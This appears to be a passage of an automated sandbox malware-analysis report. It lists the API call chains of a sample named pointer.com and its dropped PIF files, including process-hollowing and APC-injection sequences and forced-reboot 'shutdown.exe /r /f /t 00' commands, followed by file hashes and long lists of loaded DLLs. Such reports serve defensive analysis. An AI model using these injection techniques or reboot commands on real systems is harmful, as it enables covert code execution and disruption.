Source: C:\Users\Public\pointer.com	Code function: 8_2_02D37E40 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	8_2_02D37E40
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D2FCE0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,	8_2_02D2FCE0
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D2FB86 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	8_2_02D2FB86
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: 26_2_02EACA60 CoInitialize,WinExec,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,	26_2_02EACA60
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: 26_2_02EAB714 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	26_2_02EAB714
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: 26_2_02E6FB88 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	26_2_02E6FB88
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: 26_2_02E77E40 GetMonitorInfoA,CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,GetMonitorInfoA,NtWriteVirtualMemory,NtWriteVirtualMemory,GetSystemMetrics,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	26_2_02E77E40
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: 26_2_02E6FCE0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,	26_2_02E6FCE0
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: 26_2_02E8F2EC NtdllDefWindowProc_A,GetCapture,	26_2_02E8F2EC
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: 26_2_02EA30C0 NtdllDefWindowProc_A,	26_2_02EA30C0
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: 26_2_02EAB630 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	26_2_02EAB630
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: 26_2_02E6FB86 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	26_2_02E6FB86
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: 26_2_02EA3878 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	26_2_02EA3878
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: 26_2_02EA393C IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	26_2_02EA393C
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: 26_2_02E83DAC GetSubMenu,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,	26_2_02E83DAC

Source: C:\Users\Public\pointer.com

Code function: 8_2_02D6CA60 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,

8_2_02D6CA60

Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: GetPrivateProfileStringW,ExitProcess,GetModuleFileNameA,CharLowerW,CharLowerW,CharLowerW,lstrcmpW,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,WinExec, shutdown.exe /r /f /t 00	14_2_0040314B
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: GetPrivateProfileStringW,ExitProcess,GetModuleFileNameA,CharLowerW,CharLowerW,CharLowerW,lstrcmpW,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,WinExec, shutdown.exe /r /t 00	14_2_0040314B
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D13260 DisplayExitWindowsWarnings,	14_2_39D13260
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D134A0 ExitWindowsEx,	14_2_39D134A0
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: GetPrivateProfileStringW,ExitProcess,GetModuleFileNameA,CharLowerW,CharLowerW,CharLowerW,lstrcmpW,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,WinExec, shutdown.exe /r /f /t 00	25_1_0040314B
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: GetPrivateProfileStringW,ExitProcess,GetModuleFileNameA,CharLowerW,CharLowerW,CharLowerW,lstrcmpW,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,WinExec, shutdown.exe /r /t 00	25_1_0040314B

Source: C:\Users\Public\pointer.com

File created: C:\Users\Public\Libraries\truesight.sys

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows

Jump to behavior

Source: C:\Users\Public\pointer.com	Code function: 8_2_02D12160	8_2_02D12160
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D9E7BC	8_2_02D9E7BC
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D8876A	8_2_02D8876A
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D5C4B4	8_2_02D5C4B4
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D8CF71	8_2_02D8CF71
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D8BAAC	8_2_02D8BAAC
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D8D863	8_2_02D8D863
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D8BDFF	8_2_02D8BDFF
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D43DAC	8_2_02D43DAC
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D81D4F	8_2_02D81D4F
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_00415B64	14_2_00415B64
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_004024BB	14_2_004024BB
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CD99EA	14_2_39CD99EA
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D2B917	14_2_39D2B917
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CD5890	14_2_39CD5890
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CCD851	14_2_39CCD851
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CE7850	14_2_39CE7850
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CB1D8C	14_2_39CB1D8C
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D19D54	14_2_39D19D54
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D29C90	14_2_39D29C90
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D23EE0	14_2_39D23EE0
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D37010	14_2_39D37010
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CB5217	14_2_39CB5217
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CD7400	14_2_39CD7400
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CD97A0	14_2_39CD97A0
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CE56D0	14_2_39CE56D0
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CCC97D	14_2_39CCC97D
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CDC912	14_2_39CDC912
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D2A936	14_2_39D2A936
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D30BD0	14_2_39D30BD0
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D18B8A	14_2_39D18B8A
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CCEADD	14_2_39CCEADD
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D26D30	14_2_39D26D30
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D2CFC9	14_2_39D2CFC9
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CD2F40	14_2_39CD2F40
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D14E05	14_2_39D14E05
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CCE0E5	14_2_39CCE0E5
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CDE010	14_2_39CDE010
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CD6030	14_2_39CD6030
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CD05BA	14_2_39CD05BA
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CEC505	14_2_39CEC505
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CE4529	14_2_39CE4529
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D0A4C5	14_2_39D0A4C5
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CD8420	14_2_39CD8420
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CD27B0	14_2_39CD27B0
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CD6710	14_2_39CD6710
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D086C0	14_2_39D086C0
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CD46A0	14_2_39CD46A0
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D26633	14_2_39D26633
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CB51AF	14_2_39CB51AF
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D25230	14_2_39D25230
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_00415B64	25_1_00415B64
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_004024BB	25_1_004024BB
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: 26_2_02E52160	26_2_02E52160
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: 26_2_02E9C4B4	26_2_02E9C4B4
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: 26_2_02E83DAC	26_2_02E83DAC

Source: Joe Sandbox View	Dropped File: C:\Users\Public\Libraries\dbkyovyK.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
Source: Joe Sandbox View	Dropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96

Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: String function: 0040FB4B appears 32 times
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: String function: 004043FA appears 80 times
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: String function: 0041473A appears 104 times
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: String function: 0040460A appears 88 times
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: String function: 39CF5B78 appears 64 times
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: String function: 02E56B5C appears 87 times
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: String function: 02E54980 appears 77 times
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: String function: 02E54B0C appears 363 times
Source: C:\Users\Public\pointer.com	Code function: String function: 02D14980 appears 77 times
Source: C:\Users\Public\pointer.com	Code function: String function: 02D16B5C appears 87 times
Source: C:\Users\Public\pointer.com	Code function: String function: 02D14788 appears 83 times
Source: C:\Users\Public\pointer.com	Code function: String function: 02D14B0C appears 363 times

Source: netutils.dll.8.dr

Static PE information: Number of sections : 19 > 10

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ?????.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: url.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??i.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??????s.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??l????.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??l??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??l??????.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: msasn1.dll	Jump to behavior
